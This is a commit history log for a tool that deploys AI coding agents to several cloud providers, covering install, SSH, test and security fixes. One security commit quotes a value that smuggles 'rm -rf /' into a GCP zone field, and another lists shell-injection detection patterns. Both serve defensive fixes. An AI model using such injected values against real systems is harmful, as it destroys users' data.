Commit graph

1598 commits

Author SHA1 Message Date
Ahmed Abushagur
be904cbe1c
fix: install_agent double-escaping + github-auth reliability (#1460)
* docs: add spawn delete command to README

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: harden openclaw across all clouds — validation, reliability, performance

Fixes multiple issues causing openclaw to break on most clouds:

Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)

Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check

Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback

Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: skip sudo in gh install when running as root (Fly.io containers)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id

- verify_openrouter_key and verify_openrouter_model skip network calls when
  SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: remove double-escaping in install_agent that broke shell operators

install_agent() was wrapping commands with printf '%q' + bash -c before
passing them to the run callback. But run callbacks (run_server, run_sprite,
ssh_run_server) already handle escaping for remote transport. The double-
escaping turned && || > | into literal characters, causing 'source' to
treat the entire command as a single filename.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: use local github-auth.sh instead of curling from main

When running from a local checkout, base64-encode the local
github-auth.sh and send it inline to the remote machine. This
ensures fixes (like the sudo skip for root) take effect immediately
without waiting for a merge to main.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: handle github-auth errors gracefully instead of terminating

GitHub CLI setup is optional — failures should not abort the spawn
session. Guard both run_callback calls in offer_github_auth with
|| log_warn so the script continues even if gh install fails.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: use GOOGLE_GEMINI_BASE_URL to route Gemini CLI through OpenRouter

Gemini CLI ignores OPENAI_BASE_URL — it uses GEMINI_API_KEY to talk
directly to Google's API. The OpenRouter key is not a valid Google
API key, so all requests fail with "API key not valid".

Use GOOGLE_GEMINI_BASE_URL to redirect Gemini CLI to OpenRouter's
endpoint. Fixes all 9 cloud gemini scripts + manifest.json.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: guard optional spawn_agent hooks so failures don't kill the session

With set -eo pipefail, any unguarded failure terminates the script.
Several optional operations in spawn_agent were unguarded:

- agent_configure: config file uploads (agent works with defaults)
- agent_save_connection: convenience JSON for spawn list
- agent_pre_launch: gateway daemons, startup hooks
- agent_pre_provision: pre-provision prompts
- .spawnrc shell hooks: hooking env vars into .bashrc/.zshrc

These now log warnings and continue instead of aborting. Critical
steps (cloud_authenticate, agent_install, cloud_provision) still
exit on failure.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-19 05:21:55 -05:00
Ahmed Abushagur
159ad49fec
fix: harden openclaw across all clouds (#1456)
* docs: add spawn delete command to README

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: harden openclaw across all clouds — validation, reliability, performance

Fixes multiple issues causing openclaw to break on most clouds:

Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)

Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check

Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback

Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: skip sudo in gh install when running as root (Fly.io containers)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id

- verify_openrouter_key and verify_openrouter_model skip network calls when
  SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: remove double-escaping in install_agent that broke shell operators

install_agent() was wrapping commands with printf '%q' + bash -c before
passing them to the run callback. But run callbacks (run_server, run_sprite,
ssh_run_server) already handle escaping for remote transport. The double-
escaping turned && || > | into literal characters, causing 'source' to
treat the entire command as a single filename.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-19 09:25:48 +00:00
A
f621651fc0
ux: move spawn name prompt after agent/cloud selection (#1458)
The interactive flows asked users to name their spawn before they had
selected an agent or cloud, which was confusing since they didn't know
what they were naming. Move promptSpawnName() to after agent/cloud
selection and credential preflight so users have full context.

Agent: ux-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-19 01:57:25 -05:00
A
bc83ab0559
fix: deduplicate isInteractiveTTY and remove dead OVH env wrapper (#1457)
- Export isInteractiveTTY from commands.ts and import in index.ts,
  removing the duplicate definition that was missing !! boolean coercion
- Remove unused inject_env_vars_ovh function from ovh/lib/common.sh
  (all OVH scripts use spawn_agent which calls _spawn_inject_env_vars)
- Bump CLI version to 0.5.6

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-19 01:54:47 -05:00
A
930adeecb6
fix: update stale test assertions after Oracle removal and security changes (#1454)
Tests were failing due to code changes that were not reflected in test
assertions:
- env injection uses mktemp paths (/tmp/spawn_env_*) not /tmp/env_config
- Oracle Cloud removal reduced cloud count from 10 to 9 and SSH clouds from 6 to 5
- install.sh clone_cli uses safe canonical path rm (${repo_dir}) not ${dest}/repo
- Fly.io fixture coverage requires api.machines.dev in URL pattern map
- spawn_agent calls get_or_prompt_api_key internally for API key acquisition

Agent: test-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-19 00:52:47 -05:00
A
f9b07d86de
fix: correct test parameter mismatches causing 8 persistent test failures (#1455)
_multi_creds_validate tests in two files were missing the required
help_url parameter (3rd positional arg), causing env vars intended as
the 4th+ args to be consumed as help_url. This meant unset-on-failure
tests only unset 1 of N vars instead of all N.

inject_env_vars_ssh/local tests expected the old hardcoded path
/tmp/env_config but the code now uses randomized /tmp/spawn_env_*
names (a prior security fix to prevent symlink race conditions).

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-19 00:11:26 -05:00
A
76b172ea41
security: validate GCP metadata in delete script to prevent command injection (#1452)
The buildDeleteScript function in commands.ts interpolated connection.metadata.zone
and connection.metadata.project directly into a bash script string without validation.
A tampered history file could inject arbitrary shell commands via these fields
(e.g., zone='"; rm -rf /; echo "' would escape the double quotes).

Add validateMetadataValue() to security.ts and call it before interpolating
GCP zone and project values into the delete script.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-18 20:22:41 -08:00
A
fdf7a675b3
security: validate GCP username before su to prevent command injection (#1451)
Fixes command injection vulnerability in cloud-init where unquoted
$(logname 2>/dev/null || echo "$USER") could allow shell metacharacters
to be interpreted with root privileges.

Fixes #1450

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-18 23:20:27 -05:00
A
3a0ce830e5
fix: resolve unknown --default flag in CLI picker (#1449)
Add --default to KNOWN_FLAGS so it is recognized even if the `spawn pick`
early-return path is bypassed (e.g. due to Bun kqueue/TTY errors on certain
platforms). Also wrap cmdPick in a try/catch so TTY errors produce a clean
error message instead of an unhandled rejection.

Sync test copies of KNOWN_FLAGS that had drifted: unknown-flags.test.ts was
missing --debug, --headless, --output, --clear, -a, -c, --agent, --cloud;
index-dispatch-routing.test.ts had the same gaps. Fix an incorrect test that
expected --output to be flagged as unknown (it has been a known flag since
--headless/--output were added).

Fixes #1447

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-18 15:24:37 -05:00
A
7e2a7bca1e
security: replace eval with indirect expansion in GCP picker (#1448)
Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-18 15:17:31 -05:00
A
ae4aa90bb2
fix: gh CLI setup on remote VMs — pass local token through (#1444)
Fixes GitHub CLI authentication on remote VMs by passing local token through to remote installation script. Uses printf '%q' for safe shell escaping to prevent command injection.
2026-02-18 18:22:33 +00:00
A
56fda1435a
feat: collect all auth prompts before server provisioning (#1445)
Move OpenRouter OAuth and model selection prompts to run BEFORE
server provisioning in spawn_agent(). Previously the user had to
wait for the server to spin up before being prompted for their
API key and model choice. Now all interactive prompts (GitHub auth,
OpenRouter OAuth, model selection) happen upfront, then the server
provisions without further user interaction.

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-18 09:54:51 -08:00
A
e4bf4d86a4
feat: add spawn pick command and interactive GCP project/zone/machine-type pickers (#1443)
- New cli/src/picker.ts: modular picker module with pickToTTY() that renders
  an arrow-key UI directly to /dev/tty, works even when stdout is captured by
  bash $() subshell substitution and stdin is piped with options.

- New spawn pick subcommand: reads options from stdin as tab-separated lines
  (value\tLabel\tHint), shows clack-style picker via /dev/tty, writes selected
  value to stdout.  Falls back to a numbered list when no TTY is available.

  Usage from bash:
    zone=$(printf 'us-central1-a\tIowa\nus-east1-b\tVirginia\n' \
             | spawn pick --prompt "Select zone" --default "us-central1-a")

- gcp/lib/common.sh: interactive project, zone, and machine-type pickers for
  all GCP agent scripts.  Each picker respects env var overrides (GCP_PROJECT,
  GCP_ZONE, GCP_MACHINE_TYPE) and skips the prompt when already set.  Uses
  spawn pick for a nice arrow-key UI when available; falls back to
  _display_and_select (fzf or numbered list) from shared/common.sh.

  - _gcp_machine_type_options(): curated list of 8 popular instance types
  - _gcp_zone_options(): 12 curated zones across US / EU / APAC / AU
  - _gcp_project_options(): live list via gcloud projects list
  - _gcp_pick_{machine_type,zone,project}(): picker wrappers
  - _gcp_resolve_project(): now prompts interactively instead of erroring when
    no project is configured
  - create_server(): now calls pickers before provisioning instead of silently
    using defaults

- cli version bump 0.5.2 to 0.5.3

Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-18 11:30:52 -05:00
A
f3ffb6caed
fix: broken error message in multi-creds validation, predictable temp path (#1442)
1. _multi_creds_validate referenced undefined help_url variable, causing
   empty "Get new credentials from: " error messages when OVH credential
   validation fails. Added help_url as parameter and pass it from caller.

2. _spawn_inject_env_vars (used by 130+ agent scripts via spawn_agent)
   uploaded credentials to static /tmp/env_config path. The older
   inject_env_vars_ssh/inject_env_vars_cb functions document this as a
   symlink attack vector and use randomized paths. Fixed to match.

3. Removed dead inject_env_vars_fly and inject_env_vars_sprite functions
   (all agent scripts now use spawn_agent -> _spawn_inject_env_vars).

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-18 07:51:28 -05:00
Ahmed Abushagur
f2795a6d84
fix: Node.js v22 upgrade, aider uv install, SSH & cloud reliability (#1440)
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds

aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.

Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.

Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* test: update aider/gptme/interpreter assertions from pip to uv

The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).

Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* ci: trigger test run for uv assertion fix

* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds

- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
  stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
  SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
  no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
  $escaped_cmd that prevented the remote shell from consuming escapes,
  breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
  where it escaped shell operators into literal characters since daytona exec
  has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add --pty to fly ssh console for interactive sessions

fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.

Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: prepend ~/.local/bin to PATH in ssh_run_server

After uv installs to ~/.local/bin, the current shell session doesn't
have it in PATH, causing "uv: command not found" on DigitalOcean and
all other SSH-based clouds (Hetzner, AWS, GCP, OVH).

Fly.io's run_server already prepends this PATH — now the shared
ssh_run_server does the same, fixing all SSH-based clouds at once.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add Node.js to cloud-init for all cloud providers

npm-based agents (codex, kilocode, etc.) fail with "npm: command not
found" because Node.js isn't installed during cloud-init. Fly.io was
the only provider installing Node.js (in wait_for_cloud_init).

Now all cloud-init scripts install Node.js v22 LTS from nodesource,
matching Fly.io's setup. Also adds ~/.local/bin to PATH in AWS and
GCP cloud-init (was already in shared/DigitalOcean/Hetzner).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: use apt packages for nodejs/npm instead of nodesource

The nodesource setup script (setup_22.x) runs its own apt-get update
and repository configuration, nearly doubling cloud-init time and
causing hangs on DigitalOcean. Ubuntu 24.04 includes nodejs and npm
in its default repos — just add them to the packages list.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add timeouts and better error handling to Daytona CLI commands

Daytona CLI commands (login, list, create) can hang indefinitely when
the API is slow or unreachable. This causes:
- "Failed to create sandbox: timeout" with no recovery
- Token validation timeouts misreported as "invalid token"
- Users re-entering valid tokens that also timeout

Fixes:
- Wrap all daytona CLI calls with timeout (30s for auth, 120s for create)
- Detect timeout errors separately from auth errors
- Show actionable "try again / check status" messages for timeouts
- Add nodejs/npm to Daytona wait_for_cloud_init

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: set DAYTONA_API_URL to Daytona Cloud by default

The Daytona CLI may default to connecting to a local self-hosted
server instead of Daytona Cloud. Without DAYTONA_API_URL set to
https://app.daytona.io/api, every CLI command (login, list, create)
hangs trying to reach a non-existent local server and times out.

The SDK documents this as the default, but the CLI doesn't always
pick it up — now we export it explicitly.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: symlink n-installed Node.js v22 over apt v18 to prevent shadowing

n installs Node.js v22 to /usr/local/bin/node but apt's v18 at
/usr/bin/node can shadow it in non-interactive SSH sessions. After
n 22, symlink the new binaries over the apt ones so v22 is always
resolved. Also fix hcloud CLI token extraction for new TOML format.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address security review, add curl timeouts to trigger workflows

- Fix ssh_run_server command injection concern: use single-quoted
  path_prefix so $HOME/$PATH expand remotely, not locally
- Add --connect-timeout 15 --max-time 30 to trigger workflows to
  prevent 5-min hangs when server streams responses
- Handle 409 (dedup) as success — expected when cron fires every 15min
  but cycles take 35min
- Reduce workflow timeout-minutes from 5 to 2

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-18 06:54:07 -05:00
Ahmed Abushagur
0057aa01e7
docs: add spawn delete command to README (#1441)
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-18 06:48:30 -05:00
A
980a7b30f9
security: fix incomplete command injection detection gaps (#1437)
* security: fix incomplete command injection detection gaps in validatePrompt

Addresses remaining gaps identified in issue #1431:
- Add stderr/fd redirection detection (2>, 2>&1, 1>&2)
- Add heredoc detection (<< EOF, <<- EOF)
- Add process substitution detection (<(cmd), >(cmd))
- Add redirection to unextensioned filenames/paths (> output, > foo/bar)
- Add test cases for all new patterns

Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: address PR review - broaden injection detection patterns

- fd redirection: /\d+>\s*&?\d*/ covers fds 3-9 (not just 1 and 2)
- heredoc: /<<-?\s*'?\w+'?/ matches quoted delimiters like << 'EOF'
- append redirect: />>?\s*[a-zA-Z_]\w{2,}/ matches >> as well as >
- Added test cases for all 3 bypass patterns

Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-18 04:24:36 -05:00
Ahmed Abushagur
db4aaa0c73
fix: prevent SSH hangs, fix command escaping, pin Python 3.12 for aider (#1439)
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds

aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.

Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.

Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* test: update aider/gptme/interpreter assertions from pip to uv

The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).

Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* ci: trigger test run for uv assertion fix

* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds

- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
  stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
  SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
  no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
  $escaped_cmd that prevented the remote shell from consuming escapes,
  breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
  where it escaped shell operators into literal characters since daytona exec
  has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add --pty to fly ssh console for interactive sessions

fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.

Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-18 04:23:15 -05:00
A
6bfdb7da54
fix: add missing text and autocomplete mocks to cmd-interactive tests (#1438)
* fix: add missing text and autocomplete mocks to cmd-interactive tests

17 tests in cmd-interactive.test.ts were failing with
"p.text is not a function" because the @clack/prompts mock didn't
include the text() prompt (added for spawn name input) or
autocomplete() (used for agent selection). Adds both mocks to restore
full test coverage of cmdInteractive.

Agent: code-health
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: update stale version strings in update-check tests

The update-check tests mock "latest" version as 0.3.0, but the current
CLI version is 0.5.2. Since 0.3.0 < 0.5.2, compareVersions returns
false and the auto-update logic never fires, causing 5 tests to fail.
Replace mock version with 99.0.0 to future-proof against further bumps.

Agent: test-engineer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-18 04:22:38 -05:00
Ahmed Abushagur
d9e6d058e0
fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds (#1436)
aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.

Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.

Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-18 03:21:59 -05:00
A
79076bbdab
feat: add update-team skill and fix test cleanup (#1435)
* fix: clean up test directories after cmdlist integration tests

The cmdlist-integration.test.ts was creating temporary directories in
beforeEach but never cleaning them up in afterEach, leaving 1,560
test directories in /root (spawn-cmdlist-test-*).

Added rmSync cleanup in afterEach to remove the test directory after
each test run. Bumped CLI version to 0.5.2.

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* feat: add update-team skill for managing agent team services

This skill automates updating and restarting agent team services
(discovery, refactor, security, qa-cycle) with the latest configuration
from setup-agent-team.

Features:
- Reads latest setup-agent-team SKILL.md for best practices
- Identifies all deployed services via wrapper scripts
- Validates wrapper scripts have required env vars and correct paths
- Validates systemd service files for compliance
- Updates wrapper scripts and systemd configs as needed
- Restarts services and verifies health
- Supports --check-only for dry-run mode
- Can target specific services or update all

Usage:
- claude /update-team                    # Update all services
- claude /update-team discovery          # Update specific service
- claude /update-team --check-only       # Check without changes

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 23:16:48 -08:00
A
c06b7c3337
Update README.md (#1434)
Signed-off-by: A <258483684+la14-1@users.noreply.github.com>
2026-02-17 23:14:07 -08:00
L
e43279d25c
fix: pcl should checkout main before cleanup (#1433)
The /pcl skill was deleting branches without first ensuring we're on main,
which could cause errors if the current branch is about to be deleted.

## Changes:
- Add Step 1: Checkout main and pull latest
- Add Step 8: Verify final state is on main branch
- Renumber all subsequent steps

## Behavior:
**Before:** Could fail if currently on a branch being deleted
**After:** Always starts from and ends on main branch

This ensures the cleanup process is safe and leaves the repo in a clean,
predictable state (on main with all stale branches removed).

Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 23:08:14 -08:00
L
e459c9438c
fix: service scripts missing git sync before cycle (#1432)
All service scripts were missing proper git sync to latest main before
each cycle, causing them to run stale code indefinitely.

## Fixed scripts:
- **security.sh**: Added `git pull --rebase origin main` after fetch
- **refactor.sh**: Moved `git reset --hard origin/main` outside the
  refactor-only block so issue mode also syncs

## Already correct:
- **discovery.sh**: Already had `git pull --rebase origin main`
- **qa-cycle.sh**: Already had `git reset --hard origin/main`

## Documentation:
Updated SKILL.md Step 8 to explicitly require git sync before every
cycle and document both acceptable patterns (git pull vs git reset).

This explains why the security VM was running out-of-date code from
PR #1412 - it never pulled the latest changes from main.

Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 23:04:55 -08:00
A
8a4f5873f9
feat: remove Oracle Cloud, add featured_cloud per agent (#1430)
Oracle Cloud is removed as a supported provider. Each agent now has a
`featured_cloud` field in manifest.json that controls cloud sort order
in the CLI picker — featured clouds appear after credential-detected
clouds but before CLI-installed ones, with a "recommended" hint.

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-17 22:52:41 -08:00
Ahmed Abushagur
633ce8eaac
feat: upgrade default server sizes, fix Fly.io agent installs, improve E2E tests (#1428)
- Upgrade default VM sizes across clouds for better agent performance:
  - Hetzner: cpx11 → cx23 (with cx22 fallback support for deprecated types)
  - DigitalOcean: s-2vcpu-2gb → s-2vcpu-4gb
  - Daytona: 2048MB → 4096MB memory
  - Oracle: VM.Standard.E2.1.Micro → VM.Standard.A1.Flex
  - OVH: d2-2 → d2-4
- Fix Fly.io agent failures:
  - Add Node.js + build-essential to wait_for_cloud_init (fixes npm-based agents)
  - Prepend PATH in interactive_session (fixes "source not found" errors)
- Fix openclaw installs across clouds: use explicit PATH export instead of source
- Fix DigitalOcean token validation (check "uuid" not "id")
- Fix AWS cloud-init: chown .bashrc/.zshrc to ubuntu user
- Improve Hetzner fallback: add "cheapest available" as last-resort fallback
- Upgrade E2E tests: per-combo auto-fix, credential collection, robustness fixes

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 22:17:08 -08:00
Ahmed Abushagur
963144ecbd
fix: use pipx to install Aider across all clouds (#1429)
Ubuntu 24.04 blocks system-wide pip installs (PEP 668 externally-managed-
environment). Switch all aider.sh scripts from `pip install aider-chat`
to `python3 -m pip install pipx && pipx install aider-chat`, which
installs into an isolated virtualenv and works on all target distros.

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 22:16:39 -08:00
A
ac0dc485c4
fix: prevent contradictory security PR reviews via dedup gate (#1427)
The security reviewer agent could post contradictory reviews (CHANGES_REQUESTED
then APPROVED) on the same commit because each review_all cycle spawned a fresh
reviewer with no memory of prior runs. Reviews posted via `gh pr review` don't
appear in `gh pr view --comments`, so the existing comment-based dedup missed them.

Adds a review dedup step that fetches existing reviews via the GitHub API and
stops if a prior security review exists on the current HEAD commit. Also adds
commit SHA to the review body format for traceability.

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-17 20:08:20 -08:00
A
979fc4a58e
security: fix command injection in fly/lib/common.sh bash -c invocations (#1424)
Quote $escaped_cmd in bash -c arguments to prevent word splitting.
While printf '%q' escapes shell metacharacters, the lack of quotes
around the variable causes the shell to split on whitespace before
passing to bash -c, enabling argument injection.

Fixes #1422

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 20:41:42 -05:00
Ahmed Abushagur
22b6a402f4
feat: E2E test harness, QA pipeline integration, macOS compat linter (#1425)
* feat: add QA upgrade — macOS compat linter, per-agent mock assertions

Layer 1: macOS compat linter (test/macos-compat.sh)
- 12 rules (MC001–MC012) catching bash 3.2 incompatibilities
- Detects: base64 -w0 file args, non-portable echo flags, source <(),
  ((var++)), read -d, nounset flag, sed -i, date %N, local -n,
  declare -A, ${var,,}, and |&
- Added to CI lint.yml in warn-only mode for burn-in
- Integrated as Phase 0.5 in qa-dry-run.sh

Layer 2: Per-agent mock assertions
- test/fixtures/_shared_agent_assertions.sh with install checks
  for all 15 agents (claude, openclaw, aider, goose, etc.)
- Integrated into test/mock.sh via _run_agent_assertions()

Also includes branch fixes:
- Fix base64 -w0 to use stdin redirect (aws, daytona, fly)
- Fix fly/openclaw to use npm install instead of broken curl|bash

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

